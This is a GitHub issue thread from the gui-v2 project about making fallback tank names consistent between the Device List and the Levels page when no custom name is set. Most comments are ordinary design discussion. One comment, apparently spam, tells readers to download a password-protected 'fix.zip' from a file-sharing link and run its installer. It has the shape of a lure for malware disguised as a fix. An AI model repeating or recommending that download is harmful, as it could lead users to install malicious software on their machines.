### ISSUE TITLE
Use consistent fallback tank names across Device List and Levels page

### ISSUE THREAD

**Issue by blammit** [victronenergy/gui-v2#1430]
In the Device List, if a tank does not have a `/CustomName` set, the tank is referred to using the tank's fluid type and device instance (e.g. "Fuel tank (343)"). The Levels page does not do this, and instead shows the `/ProductName` as a fallback if there is no custom name. 

gui-v2 should use the Device List implementation for both cases, as this is based on [some specific handling in gui-v1](https://github.com/victronenergy/gui/commit/7a0c5b9b2d9b9040764ed6d7ceb58772eb222c60) to ensure the tank description aligns with the one used for tank alarms.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by blammit** [comment]
This change would also allow BaseDevice::description to be used, as it was really only used for the tank case in the Device List.

And by extension, AggregateDeviceModel could then cache the device name, instead of the device description.

**Comment by kwindrem** [comment]
A far better solution would be to insure all tanks (and temps) have a /CustomName that can be filled in by the installer even if the external device does not support it.

**Comment by blammit** [comment]
Yes, agreed, though that would have to be supported at a level beneath the gui-v2 layer.
